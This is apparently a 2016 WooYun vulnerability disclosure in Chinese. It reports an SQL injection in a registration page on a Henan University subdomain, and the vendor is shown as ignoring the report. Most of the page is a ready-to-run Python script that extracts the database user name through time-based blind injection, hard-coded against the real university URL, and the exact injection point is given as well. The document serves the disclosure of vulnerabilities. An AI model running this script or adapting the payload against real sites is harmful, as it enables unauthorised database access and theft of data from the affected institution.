当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193740

漏洞标题:河南大学某站注入

相关厂商:河南大学

漏洞作者: Sunshie

提交时间:2016-04-08 11:15

修复时间:2016-04-08 16:41

公开时间:2016-04-08 16:41

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

凑个热闹

详细说明:

注入点:http://wybjpkc.henu.edu.cn/regform.php?membertypeid=12%20where%201

sql.jpg


db.jpg


测试脚本:

#coding=utf-8 
import sys,urllib2 
from optparse import OptionParser 
from urllib2 import Request,urlopen,URLError,HTTPError 
import urllib
import time 
result='' 
def request(URL): 
    #print URL 
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } 
    req = urllib2.Request(URL, None, user_agent)  
         
    try: 
        request = urllib2.urlopen(req,timeout=4) 
         
    except Exception ,e: 
        time.sleep(2)
        return 'timeout' 
         
    return request.read() 
def binary_sqli(left, right, index): 
   global result 
   while 1: 
        mid = (left + right)/2 
        if mid == left: 
            result += chr(mid) 
            print result 
            break 
        payload = "if(ascii(substring(user(),"+str(index)+",1))<"+str(mid)+",1,sleep(2))" 
        html = request('http://wybjpkc.henu.edu.cn/regform.php?membertypeid=12%20where%201%20and%20'+payload+'') 
        verify = 'timeout' 
        if verify not in html: 
            right = mid 
        else: 
            left = mid 
                   
if __name__ == '__main__': 
    for i in range(1,50): 
        binary_sqli(32, 127, i)


漏洞证明:

db.jpg

修复方案:

版权声明:转载请注明来源 Sunshie@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-08 16:41

厂商回复:

已关闭

最新状态:

暂无

漏洞评价:

评价